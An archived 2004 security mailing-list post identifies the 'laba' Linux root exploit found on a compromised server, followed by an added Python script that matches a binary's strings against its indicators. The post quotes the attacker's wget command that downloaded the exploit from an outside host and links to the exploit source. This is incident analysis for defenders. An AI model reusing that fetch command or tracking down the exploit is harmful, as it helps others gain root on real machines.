[DShield] Laba Rootkit

Brian Coyle brian at linuxwidows.com
Wed Feb 4 04:17:39 GMT 2004


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Tue Feb 3 15:47:06 UTC 2004, Kevin Old wrote:

> I had a system hacked last night running a custom version of RH 7.2.
[snip]
> With that said I can't seem to find any info on the Laba rootkit.


Based on a quick analysis of the binary Kevin provided offlist, I believe
this is the source code of the exploit-

   http://www.opennet.ru/base/linux/1074188290_1755.txt.html

Note the matches with the strings output below (especially the misspelling
of 'cought').

The bash_history Kevin provided shows the binary was obtained with-

   wget rainfire.go.ro/laba.tgz

That file is still available and is identical to the one Kevin sent.

brian at honeypot:~/laba$ ls -l laba*.tgz
-rw-r--r--    1 brian    brian        9142 Feb  3 21:14 laba-orig.tgz
-rw-r--r--    1 brian    brian        9142 Feb  2 12:13 laba.tgz
brian at honeypot:~/laba$ cmp laba.tgz laba-orig.tgz


There were other files that Kevin needs to investigate, but I think
'laba' has been identified.  ;)



brian at honeypot:~/laba$ strings laba | more
{judicious snipping}

[+] PID %d GOT UID 0, enjoy!
bash
/bin/bash
burp
[!] parent check race...
SUCCESS, cought SLAB page!
FAILED!
/proc/slabinfo
fopen

read slabinfo

[+] Please wait...HEAVY SYSTEM LOAD!
        %u of %u [ %u %%  ETA %6.1f s ]
[+] overflow done, the moment of truth...



--
"We choose to go to the moon, and do the other things...
 Not because they are easy, but because they are hard." -JFK
"We choose to explore space because doing so improves our
 lives and lifts our national spirit." -GWB 2004-01-14
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)
Comment: Brian Coyle, GCIA                http://www.giac.org/GCIA.php

iD8DBQFAIHJjER3MuHUncBsRAvbNAJ9gIuJw142nmvHQBz26NM0wfAFvwACfZCA2
Gkx1MuXbpFfrk3ekhpriwfE=
=0nh5
-----END PGP SIGNATURE-----
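The triage the post walks through (byte-for-byte comparison of the recovered file against the copy still on the server, then `strings` against the tell-tale text from the published source) as an added example in Python. This is not code from the post or from the opennet.ru source; the indicator list is lifted from the strings output quoted above, the sample bytes are constructed to stand in for the real binary, and the "three or more indicators" verdict threshold is an assumption of this example.

```python
"""Triage a suspected exploit binary the way the post does:
 1. compare it byte-for-byte with a reference copy (what cmp(1) does),
 2. pull printable runs out of it (what strings(1) does),
 3. look for the tell-tale strings from the published source.
Added example; the sample "binary" below is constructed, not the real laba."""
import hashlib
import re
from typing import Dict, List

# Strings the post points at in the strings(1) output.  The misspelling
# 'cought' is kept on purpose: a typo carried over from the source is the
# strongest single match.
LABA_INDICATORS = [
    "cought SLAB page",
    "/proc/slabinfo",
    "GOT UID 0, enjoy!",
    "overflow done, the moment of truth",
    "HEAVY SYSTEM LOAD",
]

# Constructed stand-in for the recovered ELF: junk bytes around a few
# NUL-terminated strings, roughly as they would sit in .rodata.  One of the
# five indicators is deliberately absent so the match is partial.
SAMPLE_BINARY = (
    b"\x7fELF\x01\x01\x01\x00" + bytes(range(0, 16)) +
    b"[+] PID %d GOT UID 0, enjoy!\x00/bin/bash\x00\x01\x02\x03"
    b"SUCCESS, cought SLAB page!\x00FAILED!\x00/proc/slabinfo\x00"
    b"\xff\xfeab\x00"        # 'ab' is too short to count as a string
    b"[+] overflow done, the moment of truth...\x00"
)


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Runs of at least min_len printable ASCII bytes, like strings(1)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def match_indicators(data: bytes, indicators=LABA_INDICATORS) -> Dict[str, str]:
    """Map each indicator that appears to the extracted string containing it."""
    found: Dict[str, str] = {}
    for s in extract_strings(data):
        for ind in indicators:
            if ind in s and ind not in found:
                found[ind] = s
    return found


def fingerprint(data: bytes) -> Dict[str, object]:
    """Size and SHA-256, the two numbers worth recording in a report."""
    return {"size": len(data), "sha256": hashlib.sha256(data).hexdigest()}


def identical(a: bytes, b: bytes) -> bool:
    """cmp(1)-style check: same length and every byte equal."""
    return len(a) == len(b) and a == b


def triage(sample: bytes, reference: bytes,
           indicators=LABA_INDICATORS, threshold: int = 3) -> Dict[str, object]:
    """Combine the three checks.  The threshold of three indicators for a
    'laba' verdict is an assumption of this example, not from the post."""
    found = match_indicators(sample, indicators)
    report = fingerprint(sample)
    report["identical_to_reference"] = identical(sample, reference)
    report["indicators_found"] = found
    report["verdict"] = "laba" if len(found) >= threshold else "inconclusive"
    return report


if __name__ == "__main__":
    # Compare the constructed sample against itself, as the post compares
    # laba.tgz against laba-orig.tgz.
    for key, value in triage(SAMPLE_BINARY, SAMPLE_BINARY).items():
        print(f"{key}: {value}")
```

With real files, read both with `open(path, "rb").read()` and pass them to `triage`; the indicator list is the part to adapt when the published source for a different tool is in hand.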